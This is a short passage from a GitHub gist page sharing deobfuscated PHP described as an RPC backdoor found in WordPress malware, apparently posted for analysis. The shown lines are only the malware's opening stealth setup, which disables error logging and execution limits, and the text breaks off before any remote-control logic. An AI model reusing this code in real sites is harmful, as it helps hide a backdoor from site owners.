Skip to content

Instantly share code, notes, and snippets.

@ccsouthard
ccsouthard / start.php
Created August 19, 2017 17:37 — forked from notslang/start.php
a basic RPC found in some wordpress malware. original file was base64'd and obfusticated.
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@error_reporting(0);
@set_time_limit(0);
if(!defined("PHP_EOL"))
{
define("PHP_EOL", "\n");